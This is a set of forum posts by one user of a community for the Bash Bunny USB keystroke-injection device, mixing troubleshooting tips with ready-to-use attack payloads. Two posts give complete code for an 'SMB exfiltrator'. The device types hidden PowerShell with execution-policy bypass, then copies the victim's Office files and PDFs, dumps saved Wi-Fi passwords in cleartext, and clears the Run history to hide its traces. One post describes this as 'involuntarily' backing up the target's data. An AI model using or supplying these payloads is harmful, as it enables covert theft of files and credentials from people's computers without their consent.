jblk01

Active Members
  • Posts: 35

  1. Is it possible that a data line isn't making good contact but the 5V line for power is?
  2. @HD3 what about 'lsblk' and 'lsusb' ? If it's still not detected, try running 'sudo dmesg -w' and then plugging in the Bunny in arming mode. I'd also try running this command too: 'sudo screen /dev/ttyACM0 115200'
  3. Now you can involuntarily back up more of the target's data by writing to the microSD card instead of the internal storage.

     Prerequisite: SSH or serial into your Bunny MK2 and do the following: 'timedatectl set-time' followed by the current year, month and date. Then run:

        apt update ; apt install gcc
        cd /tools
        wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
        tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
        rm -f impacket-0.9.19.tar.gz
        cd impacket
        pip install -r requirements.txt
        cd ../
        mkdir tmp
        cd tmp
        pip2 install setuptools-rust
        pip2 install cryptography
        wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg
        rm -f pyasn1-0.4.8-py2.7.egg
        wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz
        tar -xzvf pycryptodomex-3.10.1.tar.gz
        cd pycryptodomex-3.10.1 && python setup.py install
        cd /tools/
        rm -rf tmp/
        cd impacket/ && python setup.py install

     Now on your microSD card, create the following directory structure:

        /smb
        |___loot/
        |___s.ps1

     Copy the following payload.txt into either switch 1 or switch 2:

        ######## INITIALIZATION ########
        REQUIRETOOL impacket
        GET SWITCH_POSITION
        # Mount SD as udisk
        udisk mount

        ######## ETHERNET STAGE ########
        LED STAGE1
        # Start the SMB Server
        python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /root/udisk/smb >> /root/udisk/smb/smbserver.log &

        ######## HID STAGE ########
        # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
        GET HOST_IP
        LED STAGE2
        ATTACKMODE HID RNDIS_ETHERNET
        Q GUI r
        Q DELAY 500
        Q STRING cmd /C \"start /b powershell -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
        Q ENTER
        LED SPECIAL
        # Wait until files are done copying
        while ! [ -f /root/udisk/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

        ######## CLEANUP ########
        LED CLEANUP
        # Delete EXFILTRATION_COMPLETE file
        rm -rf /root/udisk/smb/EXFILTRATION_COMPLETE
        # Sync file system
        sync
        # Unmount the SD card
        udisk unmount

        ######## FINISH ########
        # Trap is clean
        sync
        LED FINISH
        shutdown 0

     Finally, here is the s.ps1:

        $exfil_dir="$Env:UserProfile\Downloads"
        $exfil_dir1="$Env:UserProfile\Documents"
        $exfil_dir2="$Env:UserProfile\Desktop"
        $exfil_ext="*.doc*"
        $exfil_ext1="*.pdf*"
        $exfil_ext2="*.xls*"
        $exfil_ext3="*.ppt*"
        $loot_dir="\\172.16.64.1\s\loot\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
        mkdir $loot_dir
        robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
        robocopy $exfil_dir1 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
        robocopy $exfil_dir2 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
        (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$loot_dir\$env:UserName".txt"
        New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
        Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

     Now, eject the microSD card, insert it into your Bunny MK2, move the switch to the one where the payload.txt is placed and insert it into a Windows 10 machine. If done correctly, it should exfiltrate all files specified in the s.ps1 script to the microSD card. 🙂
  4. Hi @KinderRiegel, I was seeing the same error as you and I found a workaround: Make sure your internet connection is shared with the Bunny. Then on the Bunny: First, do 'timedatectl set-time' followed by the current year, month and date. Then, go into the /tools/impacket/ directory and run 'pip install -r requirements.txt'. For me, this failed on a few requirements so I had to go in and:

        pip2 install setuptools-rust
        pip2 install cryptography
        wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg
        rm -f pyasn1-0.4.8-py2.7.egg
        wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz
        tar -xzvf pycryptodomex-3.10.1.tar.gz
        cd pycryptodomex-3.10.1 && python setup.py install
        cd /tools/impacket/ && python setup.py install

     And from there it was working properly. 🙂
  5. Thank you @Jtyle6, does that mean that the /payloads/library/ directory is no longer exposed to the Windows (or whatever OS) machine when using "ATTACKMODE STORAGE" ?
  6. I've re-read the docs regarding the Mark2 and I'm still confused. Does my switch1 and switch2 directories need to be on the internal storage or the SD card? Also, can I have only the microSD card be presented to the host machine for loot to be written to and the payloads executed from the internal Bunny storage, so that Windows Defender doesn't zap my payloads library? If anyone can give some example payloads so that I can grasp it I'd be most grateful.
  7. Hey @joeservo, sorry that I'm late. I realized that I partially rewrote the script and didn't share it here, I apologize for that. Here it is for both you and others if need be:

        #!/bin/bash
        #
        # Title:         Faster SMB Exfiltrator version 2.0
        # Author:        Hak5Darren
        # Props:         ImNatho, mike111b, madbuda, jblk01
        # Version:       1.6.1
        # Category:      Exfiltration
        # Target:        Windows XP SP3+ (Powershell)
        # Attackmodes:   HID, Ethernet
        #
        # REQUIREMENTS
        # ============
        # SETUP:
        #
        # 1. apt update ; apt install gcc
        # 2. pip install impacket
        # 3. cd /tools/
        # 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
        # 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
        #
        #
        # LED STATUS
        # ==========
        # FAIL........Failed to find dependencies
        # STAGE1......Ethernet Stage
        # STAGE2......HID Stage
        # SPECIAL.....Receiving Files
        # CLEANUP.....Moving Liberated Files
        # FINISH......Finished
        #
        # OPTIONS
        # =======
        # Exfiltration options configured from included s.ps1 script

        ######## INITIALIZATION ########
        REQUIRETOOL impacket
        GET SWITCH_POSITION

        # Make temporary loot directory
        mkdir -p /loot/smb/

        # Delete any old exfiltration data
        rm -rf /loot/smb/*

        # Copy new powershell payload to smb share
        cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/

        # Make loot directory on USB Disk
        mkdir -p /root/udisk/loot/smb_exfiltrator

        ######## ETHERNET STAGE ########
        LED STAGE1
        ATTACKMODE RNDIS_ETHERNET

        # Start the SMB Server
        python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &

        ######## HID STAGE ########
        # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
        GET HOST_IP
        LED STAGE2
        ATTACKMODE HID RNDIS_ETHERNET
        RUN WIN powershell
        Q DELAY 1000
        Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
        Q DELAY 500
        Q ENTER
        LED SPECIAL

        # Wait until files are done copying
        while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

        ######## CLEANUP ########
        LED CLEANUP

        # Delete EXFILTRATION_COMPLETE file
        rm -rf /loot/smb/EXFILTRATION_COMPLETE

        # Move files to udisk loot directory
        mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator

        # Clean up temporary loot directory
        rm -rf /loot/smb/e/*

        # Sync file system
        sync

        ######## FINISH ########
        # Trap is clean
        LED FINISH
  8. I know it can do keystroke injection, but what about things the Bunny can do? Such as pretending to be a second network adapter, give the target a second IP address and then run an nmap scan against the target? Edit: I just saw it has Ethernet, Serial etc. on the product page. Never mind. 🙂
  9. It's available here but doesn't seem to be listed on the Essentials Field Kit page. Any thoughts @Darren Kitchen?
  10. @Geesknees - Try to access the BB via SSH or Serial. If you wish to use SSH (my preferred method) then create a payload.txt file in either the switch1 directory or the switch2 directory and enter this:

        LED M FAST
        ATTACKMODE AUTO_ETHERNET

      Save the file, remove the Bunny and then reinsert it using whichever switch directory you used. Then ssh into it:

        ssh -l root 172.16.64.1

      Password is: hak5bunny

      Then run 'udisk unmount' and then run 'udisk reformat'. This should remove all of the old files on the user accessible partition.
  11. @Foxtrot - As per my pull request on Github, I had to use a newer release of Impacket to achieve setting a username / password combo for the SMB server in my smb_exfiltrator v2 payload. Would you consider updating the .deb file here with the latest release of Impacket?
  12. @WV09 - I'm glad it works for you! My first time modifying a payload to that degree, so I was worried it might fail. I hope they add it to the main repo too.
  13. Here it is:

        REM Play the Imperial March
        STRING while ($true) {
        ENTER
        STRING [console]::beep(440,500);[console]::beep(440,500);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(698,350);[console]::beep(523,150);[console]::beep(415,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);
        ENTER
        STRING }
        ENTER

      Done 🙂
  14. Okay, I got it working on my machine so that Windows does not complain. Here is my pull request: https://github.com/hak5/bashbunny-payloads/pull/392 And the files are here: https://github.com/jblk01/bashbunny-payloads/tree/master/payloads/library/exfiltration/smb_exfiltratorV2.0
  15. @WV09 - I have updates. I factory reset my Bunny, then I installed the latest firmware (1.6). From there I did the following: You should now see a '-username' and a '-password' option. Setting these in the payload.txt along with telling Windows to authenticate with it via NET USE should make this work. I am now on my way to get my Windows 10 machine from my friend's place. I'll keep you posted.